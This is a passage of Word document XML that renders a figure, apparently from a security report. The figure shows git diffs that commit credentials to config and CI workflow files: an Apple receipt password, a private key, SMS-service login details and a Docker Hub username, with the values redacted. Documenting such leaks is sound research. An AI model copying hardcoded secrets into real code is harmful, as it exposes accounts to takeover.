          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="4111" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="32"/>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color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="1439" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="32"/>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color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"IOS_VERIFYRECEIPT_URL"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"https://sandbox.itunes.apple.com"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="1439" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="32"/>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b/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"IOS_VERIFYRECEIPT_PASSWORD"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"92c[...]"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="1439" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="32"/>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color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"NUMCONTACTSRESULT"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"10"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="1511" w:val="left" w:leader="hyphen"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto" w:before="32"/>
        <w:ind w:left="720" w:right="1243" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="80"/>
          <w:w w:val="150"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"FBPRIVATEKEY"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"-----BEGIN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>PRIVATE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>KEY-----\nMII[...]\n-----END</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>PRIVATE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>KEY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>\n"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="1439" w:val="left" w:leader="none"/>
          <w:tab w:pos="4309" w:val="left" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="31"/>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b/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"MESSENTE_USERNAME"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"a9f[.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>]"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="1439" w:val="left" w:leader="none"/>
          <w:tab w:pos="4309" w:val="left" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="32"/>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b/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"MESSENTE_PASSWORD"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"d9e[.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>]"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="32"/>
        <w:ind w:left="720" w:right="475" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>diff</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-13"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>--git</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-13"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>a/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>.github/workflows/CreateECSImage.yml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-13"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>b/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>.github/workflows/ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CreateECSImage.yml</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="1439" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="31"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>- name: Login to Docker </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Hub</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="1439" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>uses:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>docker/login-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>action@v2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="1439" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="31"/>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color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>with:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="0" simplePos="0" relativeHeight="15751680">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>1828800</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>21255</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1257300" cy="133985"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="68" name="Group 68"/>
                <wp:cNvGraphicFramePr>
                  <a:graphicFrameLocks/>
                </wp:cNvGraphicFramePr>
                <a:graphic>
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvPr id="68" name="Group 68"/>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1257300" cy="133985"/>
                          <a:chExt cx="1257300" cy="133985"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="69" name="Graphic 69"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="1257300" cy="133985"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="1257300" h="133985">
                                <a:moveTo>
                                  <a:pt x="1256852" y="133833"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="0" y="133833"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1256852" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1256852" y="133833"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                        </wps:spPr>
                        <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:prstTxWarp prst="textNoShape">
                            <a:avLst/>
                          </a:prstTxWarp>
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="70" name="Textbox 70"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="1257300" cy="133985"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p>
                              <w:pPr>
                                <w:spacing w:line="210" w:lineRule="exact" w:before="0"/>
                                <w:ind w:left="0" w:right="-15" w:firstLine="0"/>
                                <w:jc w:val="left"/>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas"/>
                                  <w:b/>
                                  <w:sz w:val="18"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas"/>
                                  <w:b/>
                                  <w:color w:val="333333"/>
                                  <w:sz w:val="18"/>
                                </w:rPr>
                                <w:t>username: </w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas"/>
                                  <w:b/>
                                  <w:color w:val="DE4F00"/>
                                  <w:spacing w:val="-2"/>
                                  <w:sz w:val="18"/>
                                </w:rPr>
                                <w:t>"tri[...]"</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                    </wpg:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group style="position:absolute;margin-left:144pt;margin-top:1.673645pt;width:99pt;height:10.55pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:15751680" id="docshapegroup53" coordorigin="2880,33" coordsize="1980,211">
                <v:rect style="position:absolute;left:2880;top:33;width:1980;height:211" id="docshape54" filled="true" fillcolor="#ffff00" stroked="false">
                  <v:fill type="solid"/>
                </v:rect>
                <v:shape style="position:absolute;left:2880;top:33;width:1980;height:211" type="#_x0000_t202" id="docshape55" filled="false" stroked="false">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p>
                        <w:pPr>
                          <w:spacing w:line="210" w:lineRule="exact" w:before="0"/>
                          <w:ind w:left="0" w:right="-15" w:firstLine="0"/>
                          <w:jc w:val="left"/>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas"/>
                            <w:b/>
                            <w:sz w:val="18"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas"/>
                            <w:b/>
                            <w:color w:val="333333"/>
                            <w:sz w:val="18"/>
                          </w:rPr>
                          <w:t>username: </w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas"/>
                            <w:b/>
                            <w:color w:val="DE4F00"/>
                            <w:spacing w:val="-2"/>
                            <w:sz w:val="18"/>
                          </w:rPr>
                          <w:t>"tri[...]"</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                  <w10:wrap type="none"/>
                </v:shape>
                <w10:wrap type="none"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
    </w:p>
    <w:p>
